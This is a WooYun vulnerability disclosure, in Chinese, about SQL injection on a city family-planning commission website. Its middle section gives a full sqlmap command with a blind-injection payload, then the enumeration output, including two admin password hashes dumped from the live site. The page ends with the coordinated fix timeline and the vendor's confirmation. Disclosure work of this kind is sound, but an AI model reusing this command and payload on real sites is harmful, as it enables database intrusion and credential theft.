当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154271

漏洞标题:宿州市人口计生委网站存在SQL注射漏洞

相关厂商:宿州市人口计生委

漏洞作者: 路人甲

提交时间:2015-11-19 11:01

修复时间:2016-01-11 15:34

公开时间:2016-01-11 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

宿州市人口计生委网站存在SQL注射漏洞

详细说明:

地址:http://**.**.**.**/web/page.php?fp=newsdetail&id=2311

python sqlmap.py -u "http://**.**.**.**/web/page.php?fp=newsdetail&id=2311" -p id --technique=B --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: db_web376217
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| vote                                  | 18061604 |
Database: db_web376217
Table: vote
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| id        | int(11)      |
| item      | varchar(254) |
| itemvalue | int(11)      |
| rct       | int(11)      |
| siteid    | int(11)      |
| voteid    | int(11)      |
+-----------+--------------+


Database: db_web376217
Table: admin
[2 entries]
+----------------------------------+
| adminpass                        |
+----------------------------------+
| 718686e03290575f2032e87bbe52a857 |
| f7f7abb049b0bdfed935676f9cf08a70 |
+----------------------------------+

漏洞证明:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fp=newsdetail&id=2311 AND 4078=4078
---
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5
current user:    'web376217@%'
current user is DBA:    False
database management system users [1]:
[*] 'web376217'@'%'
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 504     |
| GLOBAL_VARIABLES                      | 240     |
| SESSION_VARIABLES                     | 240     |
| GLOBAL_STATUS                         | 226     |
| SESSION_STATUS                        | 226     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| PARTITIONS                            | 48      |
| TABLES                                | 48      |
| CHARACTER_SETS                        | 36      |
| KEY_COLUMN_USAGE                      | 19      |
| STATISTICS                            | 19      |
| TABLE_CONSTRAINTS                     | 19      |
| SCHEMA_PRIVILEGES                     | 18      |
| PLUGINS                               | 5       |
| ENGINES                               | 4       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: db_web376217
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| vote                                  | 18061604 |
| news                                  | 8567    |
| zrxx                                  | 2795    |
| newstype                              | 2346    |
| picnews                               | 451     |
| item                                  | 441     |
| member                                | 355     |
| zr                                    | 300     |
| `user`                                | 170     |
| friendlink                            | 57      |
| media                                 | 50      |
| soft                                  | 20      |
| admin                                 | 2       |
| softtype                              | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: db_web376217
Table: admin
[1 column]
+-----------+
| Column    |
+-----------+
| adminpass |
+-----------+
Database: db_web376217
Table: member
[1 column]
+--------+
| Column |
+--------+
| upass  |
+--------+
Database: db_web376217
Table: user
[1 column]
+--------+
| Column |
+--------+
| upass  |
+--------+
Database: db_web376217
Table: zr
[1 column]
+--------+
| Column |
+--------+
| pass   |
+--------+
Database: db_web376217
Table: admin
[2 entries]
+----------------------------------+
| adminpass                        |
+----------------------------------+
| 718686e03290575f2032e87bbe52a857 |
| f7f7abb049b0bdfed935676f9cf08a70 |
+----------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fp=newsdetail&id=2311 AND 4078=4078
---
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5
available databases [2]:
[*] db_web376217
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fp=newsdetail&id=2311 AND 4078=4078
---
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5
Database: db_web376217
Table: vote
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| id        | int(11)      |
| item      | varchar(254) |
| itemvalue | int(11)      |
| rct       | int(11)      |
| siteid    | int(11)      |
| voteid    | int(11)      |
+-----------+--------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-24 17:11

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给安徽分中心,由安徽分中心后续协调网站管理单位处置。

最新状态:

暂无